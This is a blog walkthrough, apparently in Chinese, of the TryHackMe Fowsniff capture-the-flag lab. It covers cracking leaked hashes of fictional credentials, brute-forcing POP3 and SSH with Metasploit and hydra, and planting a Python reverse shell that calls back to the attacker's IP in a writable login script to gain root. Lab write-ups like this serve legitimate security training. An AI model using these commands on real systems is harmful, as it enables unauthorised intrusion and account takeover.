THM-Fowsniff CTF

本文最后更新于 2025年1月21日 晚上

最近有点偷懒了owo

信息收集

nmap

先用 nmap 扫一下

1
nmap -T4 --min-rate 1000 -sC -sV -p- 10.10.108.176

开放了 22、80、110、143 这4 个端口

访问一下发现了一个名叫 Fowsniff Corp 的公司,往下翻还能看见一条告示,大概意思是:@fowsniffcorp Twitter 账户被劫持了,上面可能会有敏感信息,那么我们去搜一下。

谷歌搜了一下,看描述找到了 twitter 发布的,点进去发现如下,有一个链接

链接进去发现已经被下线了,只能看 WP 的信息了

信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
FOWSNIFF CORP PASSWORD LEAK
            ''~``
           ( o o )
+-----.oooO--(_)--Oooo.------+
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
                 (_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!


mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!

B1gN1nj4

-------------------------------------------------------------------------------------------------
This list is entirely fictional and is part of a Capture the Flag educational challenge.

All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.

Any similarities to actual people or entities is purely coincidental and occurred accidentally.

从上面信息中我们能发现泄露了电子邮件地址和密码 hash 值

1
2
3
4
5
6
7
8
9
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

https://hashes.com/en/decrypt/hash 解出密码

1
2
3
4
5
6
7
8
9
8a28a94a588a95b80163709ab4313aa4:mailcall
ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
1dc352435fecca338acfd4be10984009:apples01
19f5af754c31f1e2651edde9250d69bb:skyler22
90dc16d47114aa13671c697fd506cf26:scoobydoo2
a92b8a29ef1183192e3d35187e0cfabd:这个没找到
0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
4d6e42f56e127803285a0a7649b5ab11:orlando12
f7fd98d380735e859f8b2ffbbede5a7e:07011972

登录

Metasploit & hydra

现在已经有用户名和密码了,那么可以使用 Metasploit 的 pop3_login 模块,使用之前找到的信息来暴力破解 POP3

将用户名和密码分别添加到 usernames.txt 和 passwords.txt 里面

1
2
3
4
5
use auxiliary/scanner/pop3/pop3_login
set rhost 10.10.253.104 (因为中间有事情出门了所以回来重新开的机器)
set user_file /home/butt3rf1y/usernames.txt
set pass_file /home/butt3rf1y/passwords.txt
run

爆出来发现 1个帐户有效:seina:scoobydoo2(msf 好慢唉唉唉:(

登录邮箱查看

1
nc 10.10.253.104 110

list 发现有两封邮件,查看一下。retr 1 读取第一封

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone

retr 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.

综合来看,我们在第一封邮件里面发现了一句 “The temporary password for SSH is “S1ck3nBluff+secureshell“”,一个临时密码

还有很多收件人“baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,mustikka@fowsniff, parede@fowsniff, sciana@fowsniff,seina@fowsniff,tegel@fowsniff”,创建一个 sshusers.txt 文件,用 hydra 来确认哪些用户没有改密码

1
hydra -L sshusers.txt -p S1ck3nBluff+secureshell ssh://10.10.253.104

由此确认用户 bsksteen 没有修改密码,现在可以直接 ssh 连接

1
ssh baksteen@10.10.253.104

连上之后发现 baksteen 属于 users

1
find / -type f -group users 2>/dev/null

这里还有一个 shell 脚本,/opt/cube/cube.sh,看了一下就是登录时显示的那个图画,但是可以修改,意味着我们可以写反向 shell 了

反弹 shell

将下列 shell 写入 /opt/cube/cube.sh 脚本中保存

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.96.245",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

退出重新登录,用 nc 监听弹 shell 的端口(我是用的 WSL,所以我直接用 Windows 的 ncat 监听的)

发现成功反弹弹了拥有 root 权限的 shell

成功拿到 flag

渗透 > 靶机 > THM
#THM 渗透
THM-Fowsniff CTF
http://example.com/2025/01/21/Fowsniff/
作者
butt3rf1y
发布于
2025年1月21日
许可协议